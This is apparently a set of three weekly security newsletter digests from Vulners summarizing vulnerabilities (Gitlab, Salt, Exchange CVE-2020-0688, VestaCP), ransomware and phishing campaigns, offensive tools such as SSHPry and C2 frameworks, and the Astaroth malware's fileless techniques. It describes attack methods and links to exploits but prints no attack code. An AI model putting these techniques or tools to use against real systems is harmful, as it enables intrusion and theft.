Vulners weekly digest #6

This review is more about exploiting vulnerabilities in attacks on various areas. We also gave examples of why security updates should not be ignored.


The most interesting vulnerabilities

If you use any tools / systems that are mentioned in this section, it is recommended to install security updates.

Gitlab multiple vulnerabilities

Many companies use such enterprise tools like Jira, Gitlab, Bitbucket and etc. Therefore, these tools are often a sweet target for attackers.This week a security patch was released to fix 13 vulnerabilities in Gitlab:

  • Path Traversal in NuGet Package Registry CVE-2020-12448. It allows to use a malicious NuGet package to read any *.nupkg file on the system.
  • OAuth Application Client Secrets Revealed CVE-2020-10187. It allows for any user to retrieve OAuth application client secrets after authorizing
  • Update Nokogiri dependency. Security fix for CVE-2020-7595
  • Update git. Security fix for CVE-2020-11008

The official description of remaining vulnerabilities: https://about.gitlab.com/releases/2020/04/30/security-release-12-10-2-released/
These issues have been fixed in the latest release, and for many of them, the CVEs is pending status.
For one of the critical vulnerabilities software developer William Bowling (@vakkz) resieved 1k$ (Path Traversal) + 19k$ (RCE) = 20k$ with detailed info in his report.
Great work!

Docker

undefined

New metasploit module based on CVE-2019-15752 with local privilege escalation via Docker-Credential-Wincred.exe. This exploit leverages a vulnerability in docker desktop community editions prior to 2.1.0.1. You can write a payload to a lower-privileged session to be executed automatically by the docker user at login.

Salt Bugs story

Timeline:

  • In mid-March this year, F-secure identified 2 vulnerabilities – CVE-2020-11651 (authentication bypass) and CVE-2020-11652 (directory-traversal) in the open-source Salt management framework. Vulnerabilities allow full remote code execution as root on servers in data centers and cloud environments
  • On April 29, Saltstack released a version of Salt V. 3000. 2, in which the vulnerabilities were fixed.
  • April 30, F-secure published write-up about vulnerabilities with the following note: “We expect that any competent hacker will be able to create 100 percent reliable exploits for these issues in under 24 hours.” It looks like a challenge for any security enthusiast, isn’t it? 🙂
  • A day after this publication, attacks began on the servers of the mobile operating system LineageOS. The developers said that the attackers used vulnerabilities in Salt.
  • A few days later, a popular blogging platform was also attacked, using vulnerabilities in Salt. The platform with 2 million installations, including organizations such as Nasa, Mozilla and DuckDuckGo.

F-Secure formally survived the time after the publication of the security updates, but it was clearly not enough for the vendors to update their systems and products.
p.s. the vulnerability is really easy to exploit 😉

https://vulners.com/threatpost/THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235

https://vulners.com/thn/THN:8E401822CBD35E8E7CCE9E5DD922A70E


Tools

Sysmon update v11.0 including features like file delete monitoring, reducing Reverse DNS lookup noise and more: https://docs.microsoft.com/en-us/sysinternals

Print-My-Shell
Shell code generator for the tiny ones. A useful tool to quickly generate shell code during CTF or other testing activity.

ROADtools
ROADtools is a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool. Meet one of the first versions of the BloodHound for AzureAD!


News

Ruthless ransomware, APT groups and Teams instead of ZOOM

Ransomware groups continue to target critical services

Microsoft Detection and Response Team (DART) has published an interesting post about ransomware and tips on how to deal with them. So far, attacks have affected aid organizations, medical billing companies, manufacturing, transportation, and government agencies. Ransomware attacks, however, are not limited to critical services, so organizations should be vigilant for signs of compromise.

To get access to target networks, recent extortion campaigns have used systems with Internet access with the following weaknesses:

  • Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication
  • Old platforms like Windows Server 2003 or Windows Server 200 without actually security updates
  • Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers
  • Citrix Application Delivery Controller (ADC) with CVE-2019-19781
  • Pulse Secure VPN systems affected by CVE-2019-11510

All ransomwares deployed in the same way and used mostly the same attack techniques. Ultimately, the specific ransom payload at the end of each attack chain was almost exclusively a stylistic choice made by the attackers.

List of active ransomware:

  • RobbinHood
  • Vatet loader
  • NetWalker
  • PonyFinal
  • Maze
  • REvil (aka Sodinokibi)
A motley crew of ransomware payloads

Few of these groups have gained fame for selling data, almost all of them have been seen viewing and filtering data during these attacks, even if they have not yet been advertised or sold. Currently, situations more often occur when, after the publication of vulnerabilities for a system/tool, a very short period of time elapses before an exploit/PoC appears.
Full report with technical datails:
https://vulners.com/mssecure/MSSECURE:E3C8B97294453D962741782EC959E79C

Maze Ransomware – this week’s winner

Operators of the Maze ransomware were able to become famous a little more than others and compromised the network of the state Bank of Costa Rica (Banco BCR), as a result of which, among other things, they stole the data of 11 million Bank cards.

On their press release, hackers claim that they first gained access to the Bank’s network back in August 2019, but did not encrypt the data, because “the probable damage could have been too much for the bank”

Press release from Maze operators

As proof of theft, Maze published the numbers of 240 credit cards without the last 4 digits, as well as their expiration dates and CVC codes:

undefined

Recently, the American IT giant Cognizant, a company from NASDAQ-100, confirmed that it was hit by the Maze ransomware . Considering 30 billion dollars of capitalization of the company the sum of the repayment for data should make not one million, and even not one tenth of millions dollars.

PerSwaysion attacks

Group IB has released a report on the investigation of a series of phishing attacks under the symbol PerSwaysion.

PerSwaysion operation also lured victims with a non-malicious PDF, and later Microsoft file sharing services, including Sway, are used-hence the name of the phishing campaign. The hackers target high-level employees in the financial, legal, and real estate industries. Geographical preferences – USA, Canada, Singapore, Germany, UK, Netherlands, Hong Kong.

According to researchers, behind a series of attacks there are several hacker groups using the same infrastructure. Most of the PerSwaysion operations were orchestrated by scammers from Nigeria and South Africa who used a Vue.js JavaScript framework-based phishing kit, evidently, developed by and rented from Vietnamese speaking hackers.

Group-IB has also set-up an online web-page where anyone can check if their email address was compromised as part of PerSwaysion attacks—however, you should only use it and enter your email if you’re highly expecting to be attacked.

Microsoft Teams

undefined

Recently there has been a lot of news about holes in the ZOOM video conferencing service. But, as it turns out, their competitors are also not far behind.

The researchers found that in the process of delivering images, Microsoft Teams uses two authentication tokens “authtoken” and “skypetoken”, the second is generated using the first and with it you can intercept the Microsoft Teams account. The “authtoken” token can be obtained by attacking the “teams .microsoft .com” subdomains. And two such CyberArk subdomains were found – this is “aadsync-test .teams .microsoft .com” and “data-dev .teams .microsoft .com”.

According to CyberArk, they transferred all the data to Microsoft and they eliminated the vulnerability, including the incorrect configuration of the domain “teams .microsoft .com”.

Vulners weekly digest #4

Your Exchange server stills sweety and other vulnerabilities.
Serious boost for pentest frameworks.
ZOOM continues to smoke and we continue write about it in our digest.


EXPLOITS and vulnerabilities

“If You Can’t Patch Your Email Server, You Should Not Be Running It”

CVE-2020-0688 becomes pupular. While the flaw was fixed as part of Microsoft’s February Patch Tuesday updates, researchers warned in a March advisory that unpatched servers are being exploited by APT actors. In one of the latest research from the RAPID7, it is reported that Exchange servers are still vulnerable to CVE-2020-0688. Researches observed attackers leverage the flaw to run system commands to conduct recon, deploy webshell backdoors and execute fileless frameworks for post-exploitation.

The exploit code that researchers from RAPID7 tested attempts show up in the Windows Application event log with source MSExchange Control Panel, level Error, and event ID 4. This log entry will include the compromised user account and long error message that includes thetext Invalid viewstate.

You can also review your IIS logs for requests to a path under /ecp (usually /ecp/default.aspx), which contain the string __VIEWSTATE and __VIEWSTATEGENERATOR. The long string in the middle of this request, as in the case of the Windows event log above, is a portion of the exploit payload. You will see the username of the compromised account name at the end of the log entry.

The update for CVE-2020-0688 should be installed on any mail server with the Exchange.

https://vulners.com/threatpost/THREATPOST:DF7C78725F19B2637603E423E56656D4

Video: https://youtu.be/7d_HoQ0LVy8

Vesta Control Panel Authenticated RCE

The vulnerability (CVE-2020-10808) was disclosed and fixed in late April. At the same time created pull request in metasploit repo. Vesta Control Panel is one of the most popular, simple and convenient panels for managing websites. Vesta Control Panel (VestaCP) through 0.9.8-26 allows Command Injection via the schedule/backup Backup Listing Endpoint.
The point of vulnerability is that an authenticated attacker with a low privileges can inject a payload in the file name starts with dot.

More detailed technical description with video POC: https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis

LimeSurvey CVE-2020-11456

An open-source simple tool which you can install on your server for compile custom templates for surveys. You can use this tool to create custom templates for surveys using formatted text with image/video integration. LimeSurvey before 4.1.12+200324 has stored XSS in application/views/admin/surveysgroups/surveySettings.php and application/models/SurveysGroups.php

PoC: https://vulners.com/exploitdb/EDB-ID:48289


Tools

GitHound

GitHound v1.1 helps to find sensitive information across all of GitHub, uploaded by any user. According to the author, this tool helped him earn money 🙂 Cool tool for Bug Bounty Hunters.

SSHPry

What if we’ll have a tool that can show us a terminal of active SSH connection? and… maybe… control it? Record it? Investigate?

Author of SSHPry 2.0 implemented technique to get ALL read() strings of connected ssh client in SSHPry.py script that mirrors a terminal of connected SSH client.

Main features:

  • Control of target’s TTY
  • Built-In Keylogger
  • Console-Level phishing
  • Record & Replay previous sessions

The video better shows the functionality of the tool:

Ps-Tools

Have you ever needed to use tool like Process Explorer in your shell session? Ps-Tools provides such an opportunity. Why this if the same thing can be done through powershell? Powershell is currently under heavy security monitoring. The authors mention only Cobalt Strike in their research, but you can use it in any framework. For example: detects any security solutions (AV, EDR, etc.), collect more detailed information for compromise system or finding more opportunities for lateral movement.

This functional helps to better understand the systems and IT infrastructure from your target and periodically polling of this information allows a Red Team to react on possible changes within the IT environment (an investigation trigger, for example). Purple Teams should test it to develop new detection rules. It is assumed that this new functionality will be used in the most advanced penetration tests.


dangerous remote work

Due to the pandemic, many organizations began to work remotely. In this regard, APT groups increased their activity through phishing/spearfishing, using the COVID-19 context, and attempts to exploit zero-day vulnerabilities in many tools for remote work: video conferences, VPNs, remote acess tools and etc.

An April analysis from Kaspersky uncovered a total of 120,000 suspicious malware and adware packages in the wild masquerading as versions of the video calling app. The research found that among a total of 1,300 suspicious files not using the Skype name, 42 percent were disguised as Zoom, followed by WebEx (22 percent), GoToMeeting (13 percent), Flock (11 percent) and Slack (11 percent).

https://vulners.com/threatpost/THREATPOST:F3563336B135A1D7C1251AE54FDC6286

Example: Cisco ‘Critical Update’ Phishing Attack Steals Webex Credentials

CVE-2016-9223, a legitimate vulnerability in CloudCenter Orchestrator Docker Engine, which is Cisco management tool for applications in multiple data-center, private-cloud and public-cloud environments. This critical flaw allowed unauthenticated, remote attackers to install Docker containers with high privileges on affected systems. However, the vulnerability was fixed in the Cisco CloudCenter Orchestrator 4.6.2 patch release (also in 2016).

zoom, are you ok?

ZOOM is still the focus of a lot of news. Researchers have uncovered a database shared on an underground forum containing more than 2,300 compromised Zoom credentials. Compromised Zoom credentials could give cybercriminals access to web conference calls.

Attckers can join meeting and blast music or videos to interfere with the meeting. This practice, called “Zoom bombing,” has been spiking upwards over the past few weeks, despite the FBI cracking down on the issue and warning that those who take part in Zoom bombing could face jail time.

https://vulners.com/threatpost/THREATPOST:2FA23249E9EBD512847353C7FFC62505

Researchers warn users to stay on the lookout for bad actors spoofing web conferencing and virtual collaboration apps. In general, attackers are taking advantage of the panic around the coronavirus with phishing emails around financial relief, promises of a cure and symptom information details.

Vulners weekly digest #2

Weekly overview of new vulnerabilities, exploits, tools and other news from the world of information security


EXPLOITS and vulnerabilities

Microsoft continues to gather most of the hype about critical vulnerabilities.
On March 23rd Microsoft released a new warning about two new critical zero-day vulnerabilities that could allow attackers to remotely gain control over their target computers. Both vulnerabilities in the Windows Adobe Type Manager Library, a font parsing software that not only parses content in a 3rd-party software but also used by Explorer to display the content of a file in the ‘Preview Pane’ or ‘Details Pane’ without having users to open it.
25 March: According to Microsoft, for Windows 10, this vulnerability is low.
From all descriptions and reviews, we can conclude that the exploitation index is in reality quite low. But you should not wait for such information to appear in APT reports or in the public exploit database.

“Microsoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month.”

Main description from Microsoft:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006

SharePoint

New metasploit module was added for CVE-2020-0646. This module allows an attacker to remote execution after sending crafted specially XOML data to SharePoint via the Workflows functionality.

https://vulners.com/zdt/1337DAY-ID-34152

OSX Privilege Escalation

Vulnerability was found for VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0). Explotation of this vulnerability may provide for attacker escalate from user normal privilages to root access on host. It is worth noting that exploits for OSX are quite rare and a new metasploit module is already on the way.

PoC: https://vulners.com/zdt/1337DAY-ID-34121
Forthcoming module: https://github.com/rapid7/metasploit-framework/pull/13123

There are also exploits without any public score or CVE number. Vulners platform collects, agregate information and specify own AI score, what is made up of various indicators. In this way, you can find a lot of information about unique vulnerabilities for which new exploits have been released (including paid ones). They were not mentioned in the news and no research has been done for them. Look at the examples below:

BustaBit

Bustabit is a real time and simple game where you can play for fun or to win money. Each round of the game, you have the opportunity to place a bet before the round starts. Every tick in the game has a chance to break. If you don’t cash out before bust, you will lose your bet.
This exploit will generate the next 10 game results after starting from your . The author of the paid exploit provides video POC of this functional.

https://vulners.com/zdt/1337DAY-ID-34134

360 Security sandbox escape

A lot of security vendors provide their own sanboxes. Sanbox is good way for test malicious samples in isolate environment. Application running in sandbox have limented access without network communications, creating files and etc. Vulnerability in 360 security sanbox bypass main sandbox features and allow an attackers to escape from the sanbox, call other programs or another instance of itself outside the sandbox.

https://vulners.com/zdt/1337DAY-ID-34125


INFOSEC TOOLS

Starkiller

Empire one of the most famous pentest framework. Starkiller is a frontend for PowerShell Empire written in VueJS. It is a nice addition to Empire tool.

uDork – Google Hacking Tool

uDork is a script written on Python that uses advanced Google search methods. This RECON tool use open lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database)

Ninja c2

Open source C2 server created by Purple team for Purple team. That’s especially relevant for test your correlation rules and threat hunting techniques. Ninja still in beta version and when the stable version released it will contains many more stealthy techinques and anti-forensic methods.

Usefull C2 matrix: https://www.thec2matrix.com/matrix


attacking News

Spyware On iPhones

A newly water hole campaign was discovered on January 10, 2020 utilizing a full remote iOS exploit chain to deploy a feature-rich implant named LightSpy. The campaign posted malicius links on multiple forums, clickbait news from websites or about pandemic/COVID-19.
The malware exploit a “silently patched” Safari vulnerability, which when rendered on the browser to the exploitation of a use after free memory flaw (tracked as CVE-2019-8605) that allows an attacker to code execution with root privileges — install the proprietary LightSpy backdoor. The bug has since been resolved with the release of iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, and watchOS 5.2.1.

By analyzing the changes in the firstly stages WebKit exploit, kaspersky discovered the list of supported devices was also significantly extended.

The most completely scheme from Trend Micro of described activity:

In addition, LightSpy targets messaging applications like Telegram, QQ, and WeChat to steal account information, contacts, groups, messages, and attached files.

Astaroth come back

Astaroth is malicious software for stealing information that came back in early February with a lot of changes in its functionality. It uses multiple fileless techniques and abuses defferent legitimate processes to attempt running undetected on compromised machines.
Microsoft Defender ATP data showing revival of Astaroth campaigns:

Astaroth now completely avoids the use of WMIC and related techniques to bypass existing detection methods. The attackers introduced new techniques that make the attack chain stealthier:

  • Abusing Alternate Data Streams (ADS) to hide malicious payloads
  • Abusing the legitimate process ExtExport.exe, a highly uncommon attack vector, to load the payload

One of the most significant updates is the use of Alternate Data Stream (ADS), which Astaroth abuses at several stages to perform various activities. ADS is a file attribute that allows a user to attach data to an existing file. The stream data and its size are not visible in File Explorer, so attacks abuse this feature to hide malicious code in plain sight.
More practical description in the research.

  1. Arrival: Spearfishing with lnk file. When clicked, the LNK file runs an obfuscated BAT cmd. The BAT drops a single-line JavaScript to the Pictures folder and invokes explorer.exe to run the JavaScript fileundefined The dropped one-liner script uses the GetObject technique to fetch and run the much larger main JavaScript directly in memory: undefined
  2. BITSAdmin abuse: The main script uses BITSadmin for download additional binaries from cammand-and-control (C2) serverundefined
  3. Alternate Data Streams abuse: Astaroth uses advanced technique for copying downloaded data in data streams. For each download, the content is copied to the ADS, and then the original content is deletedundefined
  4. ExtExport.exe abuse: The script uses another unobvious technique from the LOLBAS-project: ExtExport.exe; undefined
  5. Userinit.exe abuse;
  6. Astaroth payload: While running, the Astaroth payload reads and decrypts more components from the ADS stream of desktop.ini.

Some of payload components are credential-stealing plugins hidden inside the ADS stream of desktop.ini. Astaroth abuses these plugins to steal information from compromised systems:

  • NirSoft’s MailPassView – an email client password recovery tool
  • NirSoft’s WebBrowserPassView – a web browser password recovery tool

Nirsoft features are well-known to many threat hunters. If you have not already done so, be sure to test and explore the capabilities of nirsoft.
Astaroth attempts to detect installed security products and then tries to disable found security products.